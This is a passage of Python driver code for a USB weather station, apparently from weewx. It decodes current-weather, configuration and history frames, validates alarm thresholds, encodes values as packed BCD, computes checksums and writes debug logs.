        (g4,g5) = USBHardware.readWindDirectionShared(nbuf, 175)
        self._GustDirection = g
        self._GustDirection1 = g1
        self._GustDirection2 = g2
        self._GustDirection3 = g3
        self._GustDirection4 = g4
        self._GustDirection5 = g5

        self._GustMax._Max._Value = USBHardware.toWindspeed_6_2(nbuf, 184)
        self._GustMax._Max._IsError = (self._GustMax._Max._Value == CWeatherTraits.WindNP())
        self._GustMax._Max._IsOverflow = (self._GustMax._Max._Value == CWeatherTraits.WindOFL())
        self._GustMax._Max._Time = None if self._GustMax._Max._IsError or self._GustMax._Max._IsOverflow else USBHardware.toDateTime(nbuf, 179, 1, 'GustMax')
        self._Gust = USBHardware.toWindspeed_6_2(nbuf, 187)

        # Apparently the station returns only ONE date time for both hPa/inHg
        # Min Time Reset and Max Time Reset
        self._PressureRelative_hPaMinMax._Max._Time = USBHardware.toDateTime(nbuf, 190, 1, 'PressureRelative_hPaMax')
        self._PressureRelative_inHgMinMax._Max._Time = self._PressureRelative_hPaMinMax._Max._Time
        self._PressureRelative_hPaMinMax._Min._Time  = self._PressureRelative_hPaMinMax._Max._Time # firmware bug, should be: USBHardware.toDateTime(nbuf, 195, 1)
        self._PressureRelative_inHgMinMax._Min._Time = self._PressureRelative_hPaMinMax._Min._Time        

        (self._PresRel_hPa_Max, self._PresRel_inHg_Max) = USBHardware.readPressureShared(nbuf, 195, 1) # firmware bug, should be: self._PressureRelative_hPaMinMax._Min._Time
        (self._PressureRelative_hPaMinMax._Max._Value, self._PressureRelative_inHgMinMax._Max._Value) = USBHardware.readPressureShared(nbuf, 200, 1)
        (self._PressureRelative_hPaMinMax._Min._Value, self._PressureRelative_inHgMinMax._Min._Value) = USBHardware.readPressureShared(nbuf, 205, 1)
        (self._PressureRelative_hPa, self._PressureRelative_inHg) = USBHardware.readPressureShared(nbuf, 210, 1)

    def toLog(self):
        """Dump the complete decoded current-weather frame at debug level.

        Emits one logdbg line per reading group: value plus min/max values
        and their timestamps where the station tracks them.  Column widths
        are fixed so consecutive dumps line up in the log.
        """
        logdbg("_WeatherState=%s _WeatherTendency=%s _AlarmRingingFlags %04x" % (CWeatherTraits.forecastMap[self._WeatherState], CWeatherTraits.trendMap[self._WeatherTendency], self._AlarmRingingFlags))
        logdbg("_TempIndoor=     %8.3f _Min=%8.3f (%s)  _Max=%8.3f (%s)" % (self._TempIndoor, self._TempIndoorMinMax._Min._Value, self._TempIndoorMinMax._Min._Time, self._TempIndoorMinMax._Max._Value, self._TempIndoorMinMax._Max._Time))
        logdbg("_HumidityIndoor= %8.3f _Min=%8.3f (%s)  _Max=%8.3f (%s)" % (self._HumidityIndoor, self._HumidityIndoorMinMax._Min._Value, self._HumidityIndoorMinMax._Min._Time, self._HumidityIndoorMinMax._Max._Value, self._HumidityIndoorMinMax._Max._Time))
        logdbg("_TempOutdoor=    %8.3f _Min=%8.3f (%s)  _Max=%8.3f (%s)" % (self._TempOutdoor, self._TempOutdoorMinMax._Min._Value, self._TempOutdoorMinMax._Min._Time, self._TempOutdoorMinMax._Max._Value, self._TempOutdoorMinMax._Max._Time))
        logdbg("_HumidityOutdoor=%8.3f _Min=%8.3f (%s)  _Max=%8.3f (%s)" % (self._HumidityOutdoor, self._HumidityOutdoorMinMax._Min._Value, self._HumidityOutdoorMinMax._Min._Time, self._HumidityOutdoorMinMax._Max._Value, self._HumidityOutdoorMinMax._Max._Time))
        logdbg("_Windchill=      %8.3f _Min=%8.3f (%s)  _Max=%8.3f (%s)" % (self._Windchill, self._WindchillMinMax._Min._Value, self._WindchillMinMax._Min._Time, self._WindchillMinMax._Max._Value, self._WindchillMinMax._Max._Time))
        logdbg("_Dewpoint=       %8.3f _Min=%8.3f (%s)  _Max=%8.3f (%s)" % (self._Dewpoint, self._DewpointMinMax._Min._Value, self._DewpointMinMax._Min._Time, self._DewpointMinMax._Max._Value, self._DewpointMinMax._Max._Time))
        logdbg("_WindSpeed=      %8.3f" % self._WindSpeed)
        logdbg("_Gust=           %8.3f                                      _Max=%8.3f (%s)" % (self._Gust, self._GustMax._Max._Value, self._GustMax._Max._Time))
        logdbg('_WindDirection=    %3s    _GustDirection=    %3s' % (CWeatherTraits.windDirMap[self._WindDirection],  CWeatherTraits.windDirMap[self._GustDirection]))
        logdbg('_WindDirection1=   %3s    _GustDirection1=   %3s' % (CWeatherTraits.windDirMap[self._WindDirection1], CWeatherTraits.windDirMap[self._GustDirection1]))
        logdbg('_WindDirection2=   %3s    _GustDirection2=   %3s' % (CWeatherTraits.windDirMap[self._WindDirection2], CWeatherTraits.windDirMap[self._GustDirection2]))
        logdbg('_WindDirection3=   %3s    _GustDirection3=   %3s' % (CWeatherTraits.windDirMap[self._WindDirection3], CWeatherTraits.windDirMap[self._GustDirection3]))
        logdbg('_WindDirection4=   %3s    _GustDirection4=   %3s' % (CWeatherTraits.windDirMap[self._WindDirection4], CWeatherTraits.windDirMap[self._GustDirection4]))
        logdbg('_WindDirection5=   %3s    _GustDirection5=   %3s' % (CWeatherTraits.windDirMap[self._WindDirection5], CWeatherTraits.windDirMap[self._GustDirection5]))
        # Monthly/weekly rain totals are only logged when either is non-zero.
        if (self._RainLastMonth > 0) or (self._RainLastWeek > 0):
            logdbg("_RainLastMonth=  %8.3f                                      _Max=%8.3f (%s)" % (self._RainLastMonth, self._RainLastMonthMax._Max._Value, self._RainLastMonthMax._Max._Time))
            logdbg("_RainLastWeek=   %8.3f                                      _Max=%8.3f (%s)" % (self._RainLastWeek, self._RainLastWeekMax._Max._Value, self._RainLastWeekMax._Max._Time))
        logdbg("_Rain24H=        %8.3f                                      _Max=%8.3f (%s)" % (self._Rain24H, self._Rain24HMax._Max._Value, self._Rain24HMax._Max._Time))
        logdbg("_Rain1H=         %8.3f                                      _Max=%8.3f (%s)" % (self._Rain1H, self._Rain1HMax._Max._Value, self._Rain1HMax._Max._Time))
        logdbg("_RainTotal=      %8.3f                            _LastRainReset=         (%s)" % (self._RainTotal,  self._LastRainReset))
        logdbg("PressureRel_hPa= %8.3f _Min=%8.3f (%s)  _Max=%8.3f (%s) " % (self._PressureRelative_hPa, self._PressureRelative_hPaMinMax._Min._Value, self._PressureRelative_hPaMinMax._Min._Time, self._PressureRelative_hPaMinMax._Max._Value, self._PressureRelative_hPaMinMax._Max._Time))
        logdbg("PressureRel_inHg=%8.3f _Min=%8.3f (%s)  _Max=%8.3f (%s) " % (self._PressureRelative_inHg, self._PressureRelative_inHgMinMax._Min._Value, self._PressureRelative_inHgMinMax._Min._Time, self._PressureRelative_inHgMinMax._Max._Value, self._PressureRelative_inHgMinMax._Max._Time))
        ###logdbg('(* Bug in Weather Station: PressureRelative._Min._Time is written to location of _PressureRelative._Max._Time')
        ###logdbg('Instead of PressureRelative._Min._Time we get: _PresRel_hPa_Max= %8.3f, _PresRel_inHg_max =%8.3f;' % (self._PresRel_hPa_Max, self._PresRel_inHg_Max))


class CWeatherStationConfig(object):
    """In-memory image of the station's configuration block.

    ``read`` decodes a raw configuration frame received from the station;
    ``testConfigChanged`` re-encodes the local settings into an output
    buffer and compares checksums to decide whether a (possibly modified)
    configuration must be written back to the station.

    The ``set*`` methods validate and store alarm thresholds/formats and
    return 1 on success, 0 on rejection (logging the reason via logerr).
    """

    def __init__(self):
        self._InBufCS = 0  # checksum of received config
        self._OutBufCS = 0 # calculated config checksum from outbuf config
        self._ClockMode = 0
        self._TemperatureFormat = 0
        self._PressureFormat = 0
        self._RainFormat = 0
        self._WindspeedFormat = 0
        self._WeatherThreshold = 0
        self._StormThreshold = 0
        self._LCDContrast = 0
        self._LowBatFlags = 0
        self._WindDirAlarmFlags = 0
        self._OtherAlarmFlags = 0
        self._ResetMinMaxFlags = 0 # output only
        self._HistoryInterval = 0
        self._TempIndoorMinMax = CMinMaxMeasurement()
        self._TempOutdoorMinMax = CMinMaxMeasurement()
        self._HumidityIndoorMinMax = CMinMaxMeasurement()
        self._HumidityOutdoorMinMax = CMinMaxMeasurement()
        self._Rain24HMax = CMinMaxMeasurement()
        self._GustMax = CMinMaxMeasurement()
        self._PressureRelative_hPaMinMax = CMinMaxMeasurement()
        self._PressureRelative_inHgMinMax = CMinMaxMeasurement()

    def setTemps(self,TempFormat,InTempLo,InTempHi,OutTempLo,OutTempHi):
        """Set the temperature format and indoor/outdoor min/max alarm values.

        Returns 1 on success; 0 when the format is unknown or any value is
        outside the accepted range (-40.0 .. 59.9)."""
        f1 = TempFormat
        t1 = InTempLo
        t2 = InTempHi
        t3 = OutTempLo
        t4 = OutTempHi
        if f1 not in [ETemperatureFormat.tfFahrenheit,
                      ETemperatureFormat.tfCelsius]:
            logerr('setTemps: unknown temperature format %s' % TempFormat)
            return 0
        if t1 < -40.0 or t1 > 59.9 or t2 < -40.0 or t2 > 59.9 or \
                t3 < -40.0 or t3 > 59.9 or t4 < -40.0 or t4 > 59.9:
            logerr('setTemps: one or more values out of range')
            return 0
        self._TemperatureFormat = f1
        self._TempIndoorMinMax._Min._Value = t1
        self._TempIndoorMinMax._Max._Value = t2
        self._TempOutdoorMinMax._Min._Value = t3
        self._TempOutdoorMinMax._Max._Value = t4
        return 1

    def setHums(self,InHumLo,InHumHi,OutHumLo,OutHumHi):
        """Set indoor/outdoor humidity min/max alarm values (1..99).

        Returns 1 on success; 0 when any value is out of range."""
        h1 = InHumLo
        h2 = InHumHi
        h3 = OutHumLo
        h4 = OutHumHi
        if h1 < 1 or h1 > 99 or h2 < 1 or h2 > 99 or \
                h3 < 1 or h3 > 99 or h4 < 1 or h4 > 99:
            logerr('setHums: one or more values out of range')
            return 0
        self._HumidityIndoorMinMax._Min._Value = h1
        self._HumidityIndoorMinMax._Max._Value = h2
        self._HumidityOutdoorMinMax._Min._Value = h3
        self._HumidityOutdoorMinMax._Max._Value = h4
        return 1

    def setRain24H(self,RainFormat,Rain24hHi):
        """Set the rain format and the 24-hour rain max alarm value.

        Returns 1 on success; 0 when the format is unknown or the value
        is outside 0.0 .. 9999.9."""
        f1 = RainFormat
        r1 = Rain24hHi
        if f1 not in [ERainFormat.rfMm, ERainFormat.rfInch]:
            logerr('setRain24: unknown format %s' % RainFormat)
            return 0
        if r1 < 0.0 or r1 > 9999.9:
            logerr('setRain24: value outside range')
            return 0
        self._RainFormat = f1
        self._Rain24HMax._Max._Value = r1
        return 1

    def setGust(self,WindSpeedFormat,GustHi):
        """Set the windspeed format and the max gust alarm value (km/h only).

        Returns 1 on success; 0 when the format is unknown, not km/h, or the
        value is outside 0.0 .. 180.0."""
        # When the units of a max gust alarm are changed in the weather
        # station itself, automatically the value is converted to the new
        # unit and rounded to a whole number.  Weewx receives a value
        # converted to km/h.
        #
        # It is too much trouble to sort out what exactly the internal
        # conversion algoritms are for the other wind units.
        #
        # Setting a value in km/h units is tested and works, so this will
        # be the only option available.
        f1 = WindSpeedFormat
        g1 = GustHi
        if f1 < EWindspeedFormat.wfMs or f1 > EWindspeedFormat.wfMph:
            logerr('setGust: unknown format %s' % WindSpeedFormat)
            return 0
        if f1 != EWindspeedFormat.wfKmh:
            logerr('setGust: only units of km/h are supported')
            return 0
        if g1 < 0.0 or g1 > 180.0:
            logerr('setGust: value outside range')
            return 0
        # BUGFIX: was `self._WindSpeedFormat` (capital S), an attribute no
        # other code reads; __init__/read/testConfigChanged all use
        # `_WindspeedFormat`, so the setting was silently lost.
        self._WindspeedFormat = f1
        self._GustMax._Max._Value = int(g1) # apparently gust value is always an integer
        return 1

    def setPresRels(self,PressureFormat,PresRelhPaLo,PresRelhPaHi,PresRelinHgLo,PresRelinHgHi):
        """Set the pressure format and relative-pressure min/max alarm values
        (hPa: 920.0..1080.0, inHg: 27.10..31.90).

        Returns 1 on success; 0 when the format is unknown or a value is
        out of range."""
        f1 = PressureFormat
        p1 = PresRelhPaLo
        p2 = PresRelhPaHi
        p3 = PresRelinHgLo
        p4 = PresRelinHgHi
        if f1 not in [EPressureFormat.pfinHg, EPressureFormat.pfHPa]:
            logerr('setPresRel: unknown format %s' % PressureFormat)
            return 0
        if p1 < 920.0 or p1 > 1080.0 or p2 < 920.0 or p2 > 1080.0 or \
                p3 < 27.10 or p3 > 31.90 or p4 < 27.10 or p4 > 31.90:
            logerr('setPresRel: value outside range')
            return 0
        # BUGFIX: was `self._RainFormat = f1` — a copy-paste from setRain24H;
        # this method validates and should store the pressure format.
        self._PressureFormat = f1
        self._PressureRelative_hPaMinMax._Min._Value = p1
        self._PressureRelative_hPaMinMax._Max._Value = p2
        self._PressureRelative_inHgMinMax._Min._Value = p3
        self._PressureRelative_inHgMinMax._Max._Value = p4
        return 1

    def getOutBufCS(self):
        """Return the checksum calculated for the outgoing config buffer."""
        return self._OutBufCS

    def getInBufCS(self):
        """Return the checksum of the last received config frame."""
        return self._InBufCS

    def setResetMinMaxFlags(self, resetMinMaxFlags):
        """Store the 24-bit reset-min/max flag word (output only; see the
        bit layout documented in read())."""
        logdbg('setResetMinMaxFlags: %s' % resetMinMaxFlags)
        self._ResetMinMaxFlags = resetMinMaxFlags

    def parseRain_3(self, number, buf, start, StartOnHiNibble, numbytes):
        '''Parse 7-digit number with 3 decimals'''
        # Encode as packed BCD, one decimal digit per nibble, most
        # significant digit first; untouched nibbles of the buffer are
        # preserved.
        num = int(number*1000)
        parsebuf=[0]*7
        for i in range(7-numbytes,7):
            parsebuf[i] = num%10
            num = num//10
        if StartOnHiNibble:
            buf[0][0+start] = parsebuf[6]*16 + parsebuf[5]
            buf[0][1+start] = parsebuf[4]*16 + parsebuf[3]
            buf[0][2+start] = parsebuf[2]*16 + parsebuf[1]
            buf[0][3+start] = parsebuf[0]*16 + (buf[0][3+start] & 0xF)
        else:
            buf[0][0+start] = (buf[0][0+start] & 0xF0) + parsebuf[6]
            buf[0][1+start] = parsebuf[5]*16 + parsebuf[4]
            buf[0][2+start] = parsebuf[3]*16 + parsebuf[2]
            buf[0][3+start] = parsebuf[1]*16 + parsebuf[0]

    def parseWind_6(self, number, buf, start):
        '''Parse float number to 6 bytes'''
        # Fixed-point encoding: value * 100 * 256, packed as 6 hex nibbles,
        # most significant first, into 3 bytes.
        num = int(number*100*256)
        parsebuf=[0]*6
        for i in range(0,6):
            parsebuf[i] = num%16
            num = num//16
        buf[0][0+start] = parsebuf[5]*16 + parsebuf[4]
        buf[0][1+start] = parsebuf[3]*16 + parsebuf[2]
        buf[0][2+start] = parsebuf[1]*16 + parsebuf[0]

    def parse_0(self, number, buf, start, StartOnHiNibble, numbytes):
        '''Parse 5-digit number with 0 decimals'''
        # Packed-BCD encoding of up to 5 decimal digits into 2.5 bytes;
        # the unused nibble of the last byte is preserved.
        num = int(number)
        nbuf=[0]*5
        for i in range(5-numbytes,5):
            nbuf[i] = num%10
            num = num//10
        if StartOnHiNibble:
            buf[0][0+start] = nbuf[4]*16 + nbuf[3]
            buf[0][1+start] = nbuf[2]*16 + nbuf[1]
            buf[0][2+start] = nbuf[0]*16 + (buf[0][2+start] & 0x0F)
        else:
            buf[0][0+start] = (buf[0][0+start] & 0xF0) + nbuf[4]
            buf[0][1+start] = nbuf[3]*16 + nbuf[2]
            buf[0][2+start] = nbuf[1]*16 + nbuf[0]

    def parse_1(self, number, buf, start, StartOnHiNibble, numbytes):
        '''Parse 5 digit number with 1 decimal'''
        self.parse_0(number*10.0, buf, start, StartOnHiNibble, numbytes)

    def parse_2(self, number, buf, start, StartOnHiNibble, numbytes):
        '''Parse 5 digit number with 2 decimals'''
        self.parse_0(number*100.0, buf, start, StartOnHiNibble, numbytes)

    def parse_3(self, number, buf, start, StartOnHiNibble, numbytes):
        '''Parse 5 digit number with 3 decimals'''
        self.parse_0(number*1000.0, buf, start, StartOnHiNibble, numbytes)

    def read(self,buf):
        """Decode a raw configuration frame into the instance fields, then
        override the history interval and clear all alarm flags (see the
        comments at the end for why)."""
        nbuf=[0]
        nbuf[0]=buf[0]
        # Byte 4 packs all the display/format flags.
        self._WindspeedFormat = (nbuf[0][4] >> 4) & 0xF
        self._RainFormat = (nbuf[0][4] >> 3) & 1
        self._PressureFormat = (nbuf[0][4] >> 2) & 1
        self._TemperatureFormat = (nbuf[0][4] >> 1) & 1
        self._ClockMode = nbuf[0][4] & 1
        self._StormThreshold = (nbuf[0][5] >> 4) & 0xF
        self._WeatherThreshold = nbuf[0][5] & 0xF
        self._LowBatFlags = (nbuf[0][6] >> 4) & 0xF
        self._LCDContrast = nbuf[0][6] & 0xF
        self._WindDirAlarmFlags = (nbuf[0][7] << 8) | nbuf[0][8]
        self._OtherAlarmFlags = (nbuf[0][9] << 8) | nbuf[0][10]
        self._TempIndoorMinMax._Max._Value = USBHardware.toTemperature_5_3(nbuf, 11, 1)
        self._TempIndoorMinMax._Min._Value = USBHardware.toTemperature_5_3(nbuf, 13, 0)
        self._TempOutdoorMinMax._Max._Value = USBHardware.toTemperature_5_3(nbuf, 16, 1)
        self._TempOutdoorMinMax._Min._Value = USBHardware.toTemperature_5_3(nbuf, 18, 0)
        self._HumidityIndoorMinMax._Max._Value = USBHardware.toHumidity_2_0(nbuf, 21, 1)
        self._HumidityIndoorMinMax._Min._Value = USBHardware.toHumidity_2_0(nbuf, 22, 1)
        self._HumidityOutdoorMinMax._Max._Value = USBHardware.toHumidity_2_0(nbuf, 23, 1)
        self._HumidityOutdoorMinMax._Min._Value = USBHardware.toHumidity_2_0(nbuf, 24, 1)
        self._Rain24HMax._Max._Value = USBHardware.toRain_7_3(nbuf, 25, 0)
        self._HistoryInterval = nbuf[0][29]
        self._GustMax._Max._Value = USBHardware.toWindspeed_6_2(nbuf, 30)
        (self._PressureRelative_hPaMinMax._Min._Value, self._PressureRelative_inHgMinMax._Min._Value) = USBHardware.readPressureShared(nbuf, 33, 1)
        (self._PressureRelative_hPaMinMax._Max._Value, self._PressureRelative_inHgMinMax._Max._Value) = USBHardware.readPressureShared(nbuf, 38, 1)
        self._ResetMinMaxFlags = (nbuf[0][43]) <<16 | (nbuf[0][44] << 8) | (nbuf[0][45])
        self._InBufCS = (nbuf[0][46] << 8) | nbuf[0][47]
        # Same checksum convention (+7) as testConfigChanged, so the two
        # are directly comparable.
        self._OutBufCS = calc_checksum(buf, 4, end=39) + 7

        """
        Reset DewpointMax    80 00 00
        Reset DewpointMin    40 00 00 
        not used             20 00 00 
        Reset WindchillMin*  10 00 00  *dateTime only; Min._Value is preserved
                
        Reset TempOutMax     08 00 00
        Reset TempOutMin     04 00 00
        Reset TempInMax      02 00 00
        Reset TempInMin      01 00 00 
         
        Reset Gust           00 80 00
        not used             00 40 00
        not used             00 20 00
        not used             00 10 00 
         
        Reset HumOutMax      00 08 00
        Reset HumOutMin      00 04 00 
        Reset HumInMax       00 02 00 
        Reset HumInMin       00 01 00 
          
        not used             00 00 80
        Reset Rain Total     00 00 40
        Reset last month?    00 00 20
        Reset last week?     00 00 10 
         
        Reset Rain24H        00 00 08
        Reset Rain1H         00 00 04 
        Reset PresRelMax     00 00 02 
        Reset PresRelMin     00 00 01                 
        """
        #self._ResetMinMaxFlags = 0x000000
        #logdbg('set _ResetMinMaxFlags to %06x' % self._ResetMinMaxFlags)

        """
        setTemps(self,TempFormat,InTempLo,InTempHi,OutTempLo,OutTempHi) 
        setHums(self,InHumLo,InHumHi,OutHumLo,OutHumHi)
        setPresRels(self,PressureFormat,PresRelhPaLo,PresRelhPaHi,PresRelinHgLo,PresRelinHgHi)  
        setGust(self,WindSpeedFormat,GustHi)
        setRain24H(self,RainFormat,Rain24hHi)
        """
        # Examples:
        #self.setTemps(ETemperatureFormat.tfCelsius,1.0,41.0,2.0,42.0) 
        #self.setHums(41,71,42,72)
        #self.setPresRels(EPressureFormat.pfHPa,960.1,1040.1,28.36,30.72)
        #self.setGust(EWindspeedFormat.wfKmh,040.0)
        #self.setRain24H(ERainFormat.rfMm,50.0)        

        # Set historyInterval to 5 minutes (default: 2 hours)
        self._HistoryInterval = EHistoryInterval.hi05Min
        # Clear all alarm flags, otherwise the datastream from the weather
        # station will pause during an alarm and connection will be lost.
        self._WindDirAlarmFlags = 0x0000
        self._OtherAlarmFlags   = 0x0000

    def testConfigChanged(self,buf):
        """Re-encode the local configuration into buf and compare checksums.

        Returns 1 when the outgoing checksum differs from the received one
        (or min/max reset flags are pending), meaning the config must be
        sent to the station; returns 0 when nothing changed.  buf[0] is
        overwritten with the freshly encoded configuration either way.
        """
        nbuf = [0]
        nbuf[0] = buf[0]
        nbuf[0][0] = 16*(self._WindspeedFormat & 0xF) + 8*(self._RainFormat & 1) + 4*(self._PressureFormat & 1) + 2*(self._TemperatureFormat & 1) + (self._ClockMode & 1)
        nbuf[0][1] = self._WeatherThreshold & 0xF | 16 * self._StormThreshold & 0xF0
        nbuf[0][2] = self._LCDContrast & 0xF | 16 * self._LowBatFlags & 0xF0
        nbuf[0][3] = (self._OtherAlarmFlags >> 0) & 0xFF
        nbuf[0][4] = (self._OtherAlarmFlags >> 8) & 0xFF
        nbuf[0][5] = (self._WindDirAlarmFlags >> 0) & 0xFF
        nbuf[0][6] = (self._WindDirAlarmFlags >> 8) & 0xFF
        # reverse buf from here
        self.parse_2(self._PressureRelative_inHgMinMax._Max._Value, nbuf, 7, 1, 5)
        self.parse_1(self._PressureRelative_hPaMinMax._Max._Value, nbuf, 9, 0, 5)
        self.parse_2(self._PressureRelative_inHgMinMax._Min._Value, nbuf, 12, 1, 5)
        self.parse_1(self._PressureRelative_hPaMinMax._Min._Value, nbuf, 14, 0, 5)
        self.parseWind_6(self._GustMax._Max._Value, nbuf, 17)
        nbuf[0][20] = self._HistoryInterval & 0xF
        self.parseRain_3(self._Rain24HMax._Max._Value, nbuf, 21, 0, 7)
        self.parse_0(self._HumidityOutdoorMinMax._Max._Value, nbuf, 25, 1, 2)
        self.parse_0(self._HumidityOutdoorMinMax._Min._Value, nbuf, 26, 1, 2)
        self.parse_0(self._HumidityIndoorMinMax._Max._Value, nbuf, 27, 1, 2)
        self.parse_0(self._HumidityIndoorMinMax._Min._Value, nbuf, 28, 1, 2)
        self.parse_3(self._TempOutdoorMinMax._Max._Value + CWeatherTraits.TemperatureOffset(), nbuf, 29, 1, 5)
        self.parse_3(self._TempOutdoorMinMax._Min._Value + CWeatherTraits.TemperatureOffset(), nbuf, 31, 0, 5)
        self.parse_3(self._TempIndoorMinMax._Max._Value + CWeatherTraits.TemperatureOffset(), nbuf, 34, 1, 5)
        self.parse_3(self._TempIndoorMinMax._Min._Value + CWeatherTraits.TemperatureOffset(), nbuf, 36, 0, 5)
        # reverse buf to here
        USBHardware.reverseByteOrder(nbuf, 7, 32)
        # do not include the ResetMinMaxFlags bytes when calculating checksum
        nbuf[0][39] = (self._ResetMinMaxFlags >> 16) & 0xFF
        nbuf[0][40] = (self._ResetMinMaxFlags >>  8) & 0xFF
        nbuf[0][41] = (self._ResetMinMaxFlags >>  0) & 0xFF
        self._OutBufCS = calc_checksum(nbuf, 0, end=39) + 7
        nbuf[0][42] = (self._OutBufCS >> 8) & 0xFF
        nbuf[0][43] = (self._OutBufCS >> 0) & 0xFF
        buf[0] = nbuf[0]
        if self._OutBufCS == self._InBufCS and self._ResetMinMaxFlags == 0:
            if DEBUG_CONFIG_DATA > 2:
                logdbg('testConfigChanged: checksum not changed: OutBufCS=%04x' % self._OutBufCS)
            changed = 0
        else:
            if DEBUG_CONFIG_DATA > 0:
                logdbg('testConfigChanged: checksum or resetMinMaxFlags changed: OutBufCS=%04x InBufCS=%04x _ResetMinMaxFlags=%06x' % (self._OutBufCS, self._InBufCS, self._ResetMinMaxFlags))
            if DEBUG_CONFIG_DATA > 1:
                self.toLog()
            changed = 1
        return changed

    def toLog(self):
        """Dump the complete configuration at debug level."""
        logdbg('OutBufCS=             %04x' % self._OutBufCS)
        logdbg('InBufCS=              %04x' % self._InBufCS)
        logdbg('ClockMode=            %s' % self._ClockMode)
        logdbg('TemperatureFormat=    %s' % self._TemperatureFormat)
        logdbg('PressureFormat=       %s' % self._PressureFormat)
        logdbg('RainFormat=           %s' % self._RainFormat)
        logdbg('WindspeedFormat=      %s' % self._WindspeedFormat)
        logdbg('WeatherThreshold=     %s' % self._WeatherThreshold)
        logdbg('StormThreshold=       %s' % self._StormThreshold)
        logdbg('LCDContrast=          %s' % self._LCDContrast)
        logdbg('LowBatFlags=          %01x' % self._LowBatFlags)
        logdbg('WindDirAlarmFlags=    %04x' % self._WindDirAlarmFlags)
        logdbg('OtherAlarmFlags=      %04x' % self._OtherAlarmFlags)
        logdbg('HistoryInterval=      %s' % self._HistoryInterval)
        logdbg('TempIndoor_Min=       %s' % self._TempIndoorMinMax._Min._Value)
        logdbg('TempIndoor_Max=       %s' % self._TempIndoorMinMax._Max._Value)
        logdbg('TempOutdoor_Min=      %s' % self._TempOutdoorMinMax._Min._Value)
        logdbg('TempOutdoor_Max=      %s' % self._TempOutdoorMinMax._Max._Value)
        logdbg('HumidityIndoor_Min=   %s' % self._HumidityIndoorMinMax._Min._Value)
        logdbg('HumidityIndoor_Max=   %s' % self._HumidityIndoorMinMax._Max._Value)
        logdbg('HumidityOutdoor_Min=  %s' % self._HumidityOutdoorMinMax._Min._Value)
        logdbg('HumidityOutdoor_Max=  %s' % self._HumidityOutdoorMinMax._Max._Value)
        logdbg('Rain24HMax=           %s' % self._Rain24HMax._Max._Value)
        logdbg('GustMax=              %s' % self._GustMax._Max._Value)
        logdbg('PressureRel_hPa_Min=  %s' % self._PressureRelative_hPaMinMax._Min._Value)
        logdbg('PressureRel_inHg_Min= %s' % self._PressureRelative_inHgMinMax._Min._Value)
        logdbg('PressureRel_hPa_Max=  %s' % self._PressureRelative_hPaMinMax._Max._Value)
        logdbg('PressureRel_inHg_Max= %s' % self._PressureRelative_inHgMinMax._Max._Value)
        logdbg('ResetMinMaxFlags=     %06x (Output only)' % self._ResetMinMaxFlags)

    def asDict(self):
        """Return the configuration as a flat dict with descriptive keys."""
        return {
            'checksum_in': self._InBufCS,
            'checksum_out': self._OutBufCS,
            'format_clock': self._ClockMode,
            'format_temperature': self._TemperatureFormat,
            'format_pressure': self._PressureFormat,
            'format_rain': self._RainFormat,
            'format_windspeed': self._WindspeedFormat,
            'threshold_weather': self._WeatherThreshold,
            'threshold_storm': self._StormThreshold,
            'lcd_contrast': self._LCDContrast,
            'low_battery_flags': self._LowBatFlags,
            'alarm_flags_wind_dir': self._WindDirAlarmFlags,
            'alarm_flags_other': self._OtherAlarmFlags,
#            'reset_minmax_flags': self._ResetMinMaxFlags,
            'history_interval': self._HistoryInterval,
            'indoor_temp_min': self._TempIndoorMinMax._Min._Value,
            'indoor_temp_min_time': self._TempIndoorMinMax._Min._Time,
            'indoor_temp_max': self._TempIndoorMinMax._Max._Value,
            'indoor_temp_max_time': self._TempIndoorMinMax._Max._Time,
            'indoor_humidity_min': self._HumidityIndoorMinMax._Min._Value,
            'indoor_humidity_min_time': self._HumidityIndoorMinMax._Min._Time,
            'indoor_humidity_max': self._HumidityIndoorMinMax._Max._Value,
            'indoor_humidity_max_time': self._HumidityIndoorMinMax._Max._Time,
            'outdoor_temp_min': self._TempOutdoorMinMax._Min._Value,
            'outdoor_temp_min_time': self._TempOutdoorMinMax._Min._Time,
            'outdoor_temp_max': self._TempOutdoorMinMax._Max._Value,
            'outdoor_temp_max_time': self._TempOutdoorMinMax._Max._Time,
            'outdoor_humidity_min': self._HumidityOutdoorMinMax._Min._Value,
            'outdoor_humidity_min_time':self._HumidityOutdoorMinMax._Min._Time,
            'outdoor_humidity_max': self._HumidityOutdoorMinMax._Max._Value,
            'outdoor_humidity_max_time':self._HumidityOutdoorMinMax._Max._Time,
            'rain_24h_max': self._Rain24HMax._Max._Value,
            'rain_24h_max_time': self._Rain24HMax._Max._Time,
            'wind_gust_max': self._GustMax._Max._Value,
            'wind_gust_max_time': self._GustMax._Max._Time,
            'pressure_min': self._PressureRelative_hPaMinMax._Min._Value,
            'pressure_min_time': self._PressureRelative_hPaMinMax._Min._Time,
            'pressure_max': self._PressureRelative_hPaMinMax._Max._Value,
            'pressure_max_time': self._PressureRelative_hPaMinMax._Max._Time
            # do not bother with pressure inHg
            }


class CHistoryData(object):
    """One decoded record from the station's history buffer."""

    def __init__(self):
        # All readings start as 'not present' sentinels until read() fills them.
        self.Time = None
        self.TempIndoor = CWeatherTraits.TemperatureNP()
        self.HumidityIndoor = CWeatherTraits.HumidityNP()
        self.TempOutdoor = CWeatherTraits.TemperatureNP()
        self.HumidityOutdoor = CWeatherTraits.HumidityNP()
        self.PressureRelative = None
        self.RainCounterRaw = 0
        self.WindSpeed = CWeatherTraits.WindNP()
        self.WindDirection = EWindDirection.wdNone
        self.Gust = CWeatherTraits.WindNP()
        self.GustDirection = EWindDirection.wdNone

    def read(self, buf):
        """Decode one raw history record from buf (a list wrapping the byte
        buffer, as expected by the USBHardware helpers)."""
        nbuf = [0]
        nbuf[0] = buf[0]
        self.Gust = USBHardware.toWindspeed_3_1(nbuf, 12, 0)
        # NOTE(review): gust direction and wind direction both read the high
        # nibble of byte 14 — one would expect the gust direction to sit near
        # the gust-speed bytes; confirm against the station protocol.
        self.GustDirection = (nbuf[0][14] >> 4) & 0xF
        self.WindSpeed = USBHardware.toWindspeed_3_1(nbuf, 14, 0)
        self.WindDirection = (nbuf[0][14] >> 4) & 0xF
        self.RainCounterRaw = USBHardware.toRain_3_1(nbuf, 16, 1)
        self.HumidityOutdoor = USBHardware.toHumidity_2_0(nbuf, 17, 0)
        self.HumidityIndoor = USBHardware.toHumidity_2_0(nbuf, 18, 0)
        self.PressureRelative = USBHardware.toPressure_hPa_5_1(nbuf, 19, 0)
        self.TempIndoor = USBHardware.toTemperature_3_1(nbuf, 23, 0)
        self.TempOutdoor = USBHardware.toTemperature_3_1(nbuf, 22, 1)
        self.Time = USBHardware.toDateTime(nbuf, 25, 1, 'HistoryData')
